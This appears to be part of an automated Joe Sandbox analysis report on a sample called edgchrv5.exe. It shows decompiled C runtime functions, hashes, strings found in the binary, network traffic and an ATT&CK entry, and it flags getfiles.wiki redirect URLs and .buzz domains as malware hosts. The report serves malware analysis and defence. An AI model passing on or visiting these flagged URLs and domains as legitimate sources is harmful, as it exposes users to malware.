Part of subcall function 01003568: __getptd_noexit.LIBCMT ref: 0100356B
Part of subcall function 01003568: __amsg_exit.LIBCMT ref: 01003578

__amsg_exit.LIBCMT ref: 0100625C
__lock.LIBCMT ref: 0100626C
InterlockedDecrement.KERNEL32(?), ref: 01006289
InterlockedIncrement.KERNEL32(01422B20), ref: 010062B4

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 1e40022d86d769a114b35a40180aeb125ed04e6465a8ea473e779a76fdd7b624
Instruction ID: cf5bc7e92140f62b6bb3e5b4d2e6765d99e9083e09ffd94ecadac2fce8faf165
Opcode Fuzzy Hash: 1e40022d86d769a114b35a40180aeb125ed04e6465a8ea473e779a76fdd7b624
Instruction Fuzzy Hash: 3C01C431905A12DBFB23AB59C40578D77A1BF05720F044545E9D0772C4CB3A5A51CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 01004117 Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 41%

			E01004117(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x100d518);
				_t8 = E01003E98(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E01003EDD(_t8);
				}
				if( *0x101e2e0 != 3) {
					_push(_t23);
					L7:
					_t8 = HeapFree( *0x101cda4, 0, ??);
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E010040CE(_t31);
						 *_t10 = E0100408C(GetLastError());
					}
					goto L9;
				}
				E01005CB2(__ebx, 4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E01006CBF(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E01006CEF();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E0100416D();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}

0x01004117
0x01004119
0x0100411e
0x01004123
0x01004128
0x0100419f
0x010041a4
0x010041a4
0x01004131
0x01004176
0x01004177
0x0100417f
0x01004185
0x01004187
0x01004189
0x0100419c
0x0100419e
0x00000000
0x01004187
0x01004135
0x0100413b
0x01004140
0x01004146
0x0100414b
0x0100414d
0x0100414e
0x0100414f
0x01004155
0x01004156
0x0100415d
0x01004166
0x00000000
0x01004168
0x01004168
0x00000000
0x01004168

APIs

__lock.LIBCMT ref: 01004135

Part of subcall function 01005CB2: __mtinitlocknum.LIBCMT ref: 01005CC8
Part of subcall function 01005CB2: __amsg_exit.LIBCMT ref: 01005CD4
Part of subcall function 01005CB2: EnterCriticalSection.KERNEL32(?,?,?,01003613,0000000D,0100D4B0,00000008,01002CC9,?,00000000), ref: 01005CDC

___sbh_find_block.LIBCMT ref: 01004140
___sbh_free_block.LIBCMT ref: 0100414F
HeapFree.KERNEL32(00000000,?,0100D518,0000000C,01003559,00000000,?,010041B6,?,00000001,?,?,01005C3C,00000018,0100D558,0000000C), ref: 0100417F
GetLastError.KERNEL32(?,010041B6,?,00000001,?,?,01005C3C,00000018,0100D558,0000000C,01005CCD,?,?,?,01003613,0000000D), ref: 01004190

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: e699c0a86b306a9e9bb7d62ac7a4422ecd54a4fb2c2aead6b2a8e6af21d4a80c
Instruction ID: eadc5be43537d8eb891800f18c3b784280f73d043a22254e948430c4d9e9f84b
Opcode Fuzzy Hash: e699c0a86b306a9e9bb7d62ac7a4422ecd54a4fb2c2aead6b2a8e6af21d4a80c
Instruction Fuzzy Hash: CB01A231E05306AAFB33ABB49D05BDE3AB4AF21360F100248F6D4EA1C0CB3985408B98

Uniqueness

Uniqueness Score: -1.00%

Function 01002C5E Relevance: 7.5, APIs: 5, Instructions: 24
threadCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E01002C5E(intOrPtr __edx, void* __edi, long _a4, char _a8, intOrPtr _a12, long _a16, DWORD* _a20) {
				struct _SECURITY_ATTRIBUTES* _v0;
				intOrPtr _v4;
				DWORD* _v12;
				void* _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __esi;
				void* _t30;
				void* _t36;
				DWORD* _t41;
				intOrPtr* _t43;
				void* _t45;
				void* _t51;
				long _t54;
				intOrPtr _t61;
				void* _t64;
				intOrPtr _t65;
				intOrPtr* _t67;
				void* _t68;
				intOrPtr _t71;
				void* _t74;

				_t64 = __edi;
				_t61 = __edx;
				_t74 = _v24;
				E01003CB3(_v28);
				asm("int3");
				_t71 = _t74;
				_push(_t67);
				E0100337A();
				_t30 = E0100335A(E01003374());
				if(_t30 != 0) {
					_t54 = _a4;
					 *((intOrPtr*)(_t30 + 0x54)) =  *((intOrPtr*)(_t54 + 0x54));
					 *((intOrPtr*)(_t30 + 0x58)) =  *((intOrPtr*)(_t54 + 0x58));
					_t61 =  *((intOrPtr*)(_t54 + 4));
					_push(_t54);
					 *((intOrPtr*)(_t30 + 4)) = _t61;
					E01003582(_t51, __edi, _t67, __eflags);
				} else {
					_t67 = _a4;
					if(E010033AE(E01003374(), _t67) == 0) {
						ExitThread(GetLastError());
					}
					 *_t67 = GetCurrentThreadId();
				}
				_t79 =  *0x101e424;
				if( *0x101e424 != 0) {
					_t45 = E01003940(_t79, 0x101e424);
					_pop(_t54);
					_t80 = _t45;
					if(_t45 != 0) {
						 *0x101e424(); // executed
					}
				}
				E01002C29(_t61, _t64, _t67, _t80); // executed
				asm("int3");
				_push(_t71);
				_push(_t54);
				_push(_t51);
				_push(_t64);
				_t65 = _v4;
				_v24 = 0;
				_t81 = _t65;
				if(_t65 != 0) {
					_push(_t67);
					E0100337A();
					_t68 = E010041EA(1, 0x214);
					__eflags = _t68;
					if(__eflags == 0) {
						L18:
						_push(_t68);
						E01004117(0, _t65, _t68, __eflags);
						__eflags = _v12;
						if(_v12 != 0) {
							E010040F4(_v12);
						}
						_t36 = 0;
						__eflags = 0;
					} else {
						_push( *((intOrPtr*)(E01003568(0, _t61, _t65, __eflags) + 0x6c)));
						_push(_t68);
						E01003408(0, _t65, _t68, __eflags);
						 *(_t68 + 4) =  *(_t68 + 4) | 0xffffffff;
						 *((intOrPtr*)(_t68 + 0x58)) = _a12;
						_t41 = _a20;
						 *((intOrPtr*)(_t68 + 0x54)) = _t65;
						__eflags = _t41;
						if(_t41 == 0) {
							_t41 =  &_a8;
						}
						_t36 = CreateThread(_v0, _a4, E01002C6A, _t68, _a16, _t41); // executed
						__eflags = _t36;
						if(__eflags == 0) {
							_v12 = GetLastError();
							goto L18;
						}
					}
				} else {
					_t43 = E010040CE(_t81);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					 *_t43 = 0x16;
					E010043BB(_t61, _t65, _t67);
					_t36 = 0;
				}
				return _t36;
			}

0x01002c5e
0x01002c5e
0x01002c5e
0x01002c64
0x01002c69
0x01002c6d
0x01002c6f
0x01002c70
0x01002c7b
0x01002c82
0x01002cae
0x01002cb4
0x01002cba
0x01002cbd
0x01002cc0
0x01002cc1
0x01002cc4
0x01002c84
0x01002c84
0x01002c95
0x01002c9e
0x01002c9e
0x01002caa
0x01002caa
0x01002cc9
0x01002cd0
0x01002cd7
0x01002cdc
0x01002cdd
0x01002cdf
0x01002ce1
0x01002ce1
0x01002cdf
0x01002ce7
0x01002cec
0x01002cef
0x01002cf2
0x01002cf3
0x01002cf4
0x01002cf5
0x01002cfa
0x01002cfd
0x01002cff
0x01002d1d
0x01002d1e
0x01002d2f
0x01002d33
0x01002d35
0x01002d81
0x01002d81
0x01002d82
0x01002d88
0x01002d8b
0x01002d90
0x01002d95
0x01002d96
0x01002d96
0x01002d37
0x01002d3c
0x01002d3f
0x01002d40
0x01002d48
0x01002d4c
0x01002d4f
0x01002d54
0x01002d57
0x01002d59
0x01002d5b
0x01002d5b
0x01002d6e
0x01002d74
0x01002d76
0x01002d7e
0x00000000
0x01002d7e
0x01002d76
0x01002d01
0x01002d01
0x01002d06
0x01002d07
0x01002d08
0x01002d09
0x01002d0a
0x01002d0b
0x01002d11
0x01002d19
0x01002d19
0x01002d9c

APIs

Part of subcall function 01003CB3: _doexit.LIBCMT ref: 01003CBF

___set_flsgetvalue.LIBCMT ref: 01002C70

Part of subcall function 0100337A: TlsGetValue.KERNEL32(?,01002C75), ref: 01003383
Part of subcall function 0100337A: __decode_pointer.LIBCMT ref: 01003395
Part of subcall function 0100337A: TlsSetValue.KERNEL32(00000000,01002C75), ref: 010033A4

___fls_getvalue@4.LIBCMT ref: 01002C7B

Part of subcall function 0100335A: TlsGetValue.KERNEL32(?,?,01002C80,00000000), ref: 01003368

___fls_setvalue@8.LIBCMT ref: 01002C8E

Part of subcall function 010033AE: __decode_pointer.LIBCMT ref: 010033BF

GetLastError.KERNEL32(00000000,?,00000000), ref: 01002C97
ExitThread.KERNEL32 ref: 01002C9E
GetCurrentThreadId.KERNEL32 ref: 01002CA4

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: Value$Thread__decode_pointer$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue_doexit
String ID:
API String ID: 1018078644-0
Opcode ID: 456ceaba663d4e0a0587c9aca1bdd5a5e55d82b7351a2a1e64917b36461f8ed6
Instruction ID: e1de4ac237611fcb699375aa2d14ea0874ca2362bb3f9d0ac4aef78e9dc15e03
Opcode Fuzzy Hash: 456ceaba663d4e0a0587c9aca1bdd5a5e55d82b7351a2a1e64917b36461f8ed6
Instruction Fuzzy Hash: 96E04F7580060A6FFB2337F2894C8DE776C7E21244F108150B9C09B284DE28940187A3

Uniqueness

Uniqueness Score: -1.00%

Function 01008ACB Relevance: 6.1, APIs: 4, Instructions: 103
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E01008ACB(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E01004545( &_v20, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E01008BFC( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E010040CE(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								__eflags = _a12 -  *(_t56 + 0xac);
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t57 =  *(_t56 + 0xac);
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x01008ad5
0x01008adc
0x01008af3
0x00000000
0x01008ae3
0x01008ae5
0x01008aff
0x01008b04
0x01008b07
0x01008b0a
0x01008b33
0x01008b3a
0x01008b3c
0x01008bbd
0x01008bd8
0x01008bda
0x01008b1a
0x01008b1a
0x01008b1d
0x01008b1f
0x01008b22
0x01008b22
0x01008b22
0x01008b22
0x00000000
0x01008b28
0x01008b9c
0x01008b9c
0x01008ba1
0x01008ba7
0x01008baa
0x01008bac
0x01008baf
0x01008baf
0x01008baf
0x01008baf
0x00000000
0x01008bb3
0x01008b3e
0x01008b41
0x01008b47
0x01008b4a
0x01008b71
0x01008b74
0x01008b7a
0x00000000
0x00000000
0x01008b7c
0x01008b7f
0x00000000
0x00000000
0x01008b81
0x01008b81
0x01008b87
0x01008b8a
0x01008af8
0x01008af8
0x01008b93
0x00000000
0x01008b93
0x01008b4c
0x01008b4f
0x00000000
0x00000000
0x01008b53
0x01008b64
0x01008b6a
0x01008b6c
0x01008b6f
0x00000000
0x00000000
0x00000000
0x01008b6f
0x01008b0c
0x01008b0f
0x01008b11
0x01008b17
0x01008b17
0x00000000
0x01008ae7
0x01008ae7
0x01008aec
0x01008af0
0x01008af0
0x00000000
0x01008aec
0x01008ae5

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 01008AFF
__isleadbyte_l.LIBCMT ref: 01008B33
MultiByteToWideChar.KERNEL32(00000080,00000009,01002E58,?,00000000,00000000,?,?,?,?,01002E58,00000000,?), ref: 01008B64
MultiByteToWideChar.KERNEL32(00000080,00000009,01002E58,00000001,00000000,00000000,?,?,?,?,01002E58,00000000,?), ref: 01008BD2

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: b8bc5d92b380e38dde5faf07007f225935394ebe0dee1ef7897850f078e4c460
Instruction ID: 051f87cd89c697b53337de1c03e47b5e8fe33228b13ed604bc05d6509f6e9e0e
Opcode Fuzzy Hash: b8bc5d92b380e38dde5faf07007f225935394ebe0dee1ef7897850f078e4c460
Instruction Fuzzy Hash: C931A271D00256EFFB22DFA8C8909AD3FE4BF02210F05C5AAE6919B1D1D7709980CB54

Uniqueness

Uniqueness Score: -1.00%

Function 01005F94 Relevance: 6.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E01005F94(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				signed int _t13;
				intOrPtr _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x100d578);
				E01003E98(__ebx, __edi, __esi);
				_t28 = E01003568(__ebx, __edx, __edi, _t30);
				_t13 =  *0x100ec80; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t13) == 0) {
					L6:
					E01005CB2(_t22, 0xc);
					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
					_t8 = _t28 + 0x6c; // 0x6c
					_t26 =  *0x100e4a0; // 0x100e3c8
					 *((intOrPtr*)(_t29 - 0x1c)) = E01005F56(_t8, _t26);
					 *(_t29 - 4) = 0xfffffffe;
					E01005FFE();
				} else {
					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(E01003568(_t22, __edx, _t26, _t32) + 0x6c));
					}
				}
				if(_t28 == 0) {
					E01003A2D(_t25, _t26, 0x20);
				}
				return E01003EDD(_t28);
			}

0x01005f94
0x01005f94
0x01005f94
0x01005f94
0x01005f94
0x01005f96
0x01005f9b
0x01005fa5
0x01005fa7
0x01005faf
0x01005fd3
0x01005fd5
0x01005fdb
0x01005fdf
0x01005fe2
0x01005fed
0x01005ff0
0x01005ff7
0x01005fb1
0x01005fb1
0x01005fb5
0x00000000
0x01005fb7
0x01005fbc
0x01005fbc
0x01005fb5
0x01005fc1
0x01005fc5
0x01005fca
0x01005fd2

APIs

__getptd.LIBCMT ref: 01005FA0

Part of subcall function 01003568: __getptd_noexit.LIBCMT ref: 0100356B
Part of subcall function 01003568: __amsg_exit.LIBCMT ref: 01003578

__getptd.LIBCMT ref: 01005FB7
__amsg_exit.LIBCMT ref: 01005FC5
__lock.LIBCMT ref: 01005FD5

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 1c321928524c053764ed85686390b48f80b1368a878cf65cc74dd95c8a8b7c6a
Instruction ID: 151ee19a6e78b8a114b7cd5b085157af1828794b5f92718b4961eff99a25762c
Opcode Fuzzy Hash: 1c321928524c053764ed85686390b48f80b1368a878cf65cc74dd95c8a8b7c6a
Instruction Fuzzy Hash: 82F090329407069FF763FB688D06BAD76A0BF10720F904A5DD5D0AB2D0CB389801CF62

Uniqueness

Uniqueness Score: -1.00%

Source: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzc=	Avira URL Cloud: Label: malware
Source: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=	Avira URL Cloud: Label: malware
Source: https://getfiles.wiki/redirect.php	Avira URL Cloud: Label: malware
Source: https://getfiles.wiki/welcome.php	Avira URL Cloud: Label: malware

Source: Joe Sandbox View	IP Address: 141.101.120.10 141.101.120.10
Source: Joe Sandbox View	IP Address: 38.128.66.115 38.128.66.115

Source: edgchrv5.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: edgchrv5.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: edgchrv5.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: edgchrv5.exe	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: edgchrv5.exe	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: edgchrv5.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: edgchrv5.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: edgchrv5.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: edgchrv5.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: edgchrv5.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: edgchrv5.exe	String found in binary or memory: http://ocsp.digicert.com0X
Source: edgchrv5.exe	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: edgchrv5.exe	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: edgchrv5.exe	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: edgchrv5.exe	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: chromecache_131.4.dr	String found in binary or memory: https://api.ipify.org?format=jsonp&callback=getIP
Source: chromecache_132.4.dr	String found in binary or memory: https://campaignkeepy.buzz/
Source: chromecache_132.4.dr	String found in binary or memory: https://campaignkejfcv.buzz/
Source: chromecache_131.4.dr	String found in binary or memory: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=
Source: edgchrv5.exe, edgchrv5.exe, 00000000.00000002.397704318.000000000144A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://getfiles.wiki/welcome.php
Source: edgchrv5.exe, 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://getfiles.wiki/welcome.php%s
Source: edgchrv5.exe, 00000000.00000002.397704318.0000000001485000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://getfiles.wiki/welcome.php&Svh&
Source: edgchrv5.exe, 00000000.00000002.397704318.000000000144A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://getfiles.wiki/welcome.phpFp1
Source: edgchrv5.exe, 00000000.00000002.397704318.0000000001485000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://getfiles.wiki/welcome.phpX
Source: edgchrv5.exe, 00000000.00000002.397704318.0000000001485000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://getfiles.wiki/welcome.php~
Source: chromecache_133.4.dr	String found in binary or memory: https://t.dtscout.com/pv/
Source: edgchrv5.exe	String found in binary or memory: https://www.globalsign.com/repository/0

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 12 Jun 2023 17:07:05 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'report-sample' 'nonce-OUKiuXTGfIwuxOWZhMdFvQ' 'unsafe-inline' 'unsafe-eval';object-src 'none';base-uri 'self';worker-src 'self';report-uri /webstore/cspreportContent-Security-Policy: require-trusted-types-for 'script';report-uri https://csp.withgoogle.com/csp/chromewebstore/2Report-To: {"group":"coop_chromewebstore","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/chromewebstore"}]}Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="coop_chromewebstore"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffSet-Cookie: NID=511=O-41PZOM4JAM3O6mR84aHb-HJ-jhkNo9A_SU_tcUFwraceM8b7md4ZwaxRCSxgUzeWp1LDTBoywCojdX06a53Hjy_wzxWMkPy7y7icAKwm1K6JVsR4TrPpFgmtoaBUQ_1Pn_zAV4OOERT7LeniKI1zSAXY-itFT79HH5kFMsDuc; expires=Tue, 12-Dec-2023 17:07:05 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 12 Jun 2023 17:07:12 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachevary: User-Agentx-turbo-charged-by: LiteSpeedCF-Cache-Status: BYPASSReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qDygGzpyVf%2FvXRZ8%2B8g7Doys1Hqvo9OGEGOztGaigdYFHOxl5%2BCHxGfDS%2FHsIBI%2FGtFnZCUdpiP6cmTWPUdk3BtIDngxQmeZkYkp%2B0JxsD05i5KWS9BqX9jj5M08v1L3"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7d63b04e5dc068f2-FRAalt-svc: h3=":443"; ma=86400

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

